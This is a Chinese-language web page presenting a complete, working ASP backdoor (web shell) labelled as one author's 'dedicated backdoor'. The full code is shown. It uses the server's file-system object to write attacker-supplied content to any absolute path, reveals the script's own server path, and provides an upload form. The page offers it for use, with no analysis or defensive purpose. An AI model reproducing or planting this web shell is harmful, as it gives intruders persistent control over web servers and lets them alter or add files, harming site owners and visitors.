七步倒┈→专用asp后门

时间:2022-04-05 13:37:40
  1. <html>  
  2. <head>  
  3. <title>七步倒┈→专用asp后门</title>  
  4. </head>  
  5. </html>  
  6. <%dim objFSO%>  
  7. <%dim fdata%>  
  8. <%dim objCountFile%>  
  9. <%on error resume next%>  
  10. <%Set objFSO = Server.CreateObject("Scripting.FileSystemObject")%>  
  11. <%if Trim(request("syfdpath"))<>"" then%>  
  12. <%fdata = request("cyfddata")%>  
  13. <%Set objCountFile=objFSO.CreateTextFile(request("syfdpath"),True)%>  
  14. <%objCountFile.Write fdata%>  
  15. <%if err =0 then%>  
  16. <%response.write "<font color=blue>Save Success!</font>"%>  
  17. <%else%>  
  18. <%response.write "<font color=red>Save UnSuccess!</font>"%>  
  19. <%end if%>  
  20. <%err.clear%>  
  21. <%end if%>  
  22. <%objCountFile.Close%>  
  23. <%Set objCountFile=Nothing%>  
  24. <%Set objFSO = Nothing%>  
  25. <%Response.write "<form action='''' method=post>"%>  
  26. <%Response.write "<font color=blue>save file绝对路径:</font>"%>  
  27. <%Response.Write "<input type=text name=syfdpath width=32 size=50>"%>  
  28. <%Response.Write "<br>"%>  
  29. <%Response.write "<font color=red>file of 绝对路径"%>  
  30. <%=server.mappath(Request.ServerVariables("SCRIPT_NAME"))%>  
  31. <%Response.write "<br>"%>  
  32. <%Response.write "input:"%>  
  33. <%Response.write "<textarea name=cyfddata cols=80 rows=10   
  34. width=50></textarea>"%>  
  35. <%Response.write "<input type=submit value=save>"%>  
  36. <%Response.write "</form>"%>  
  37. BY:七步倒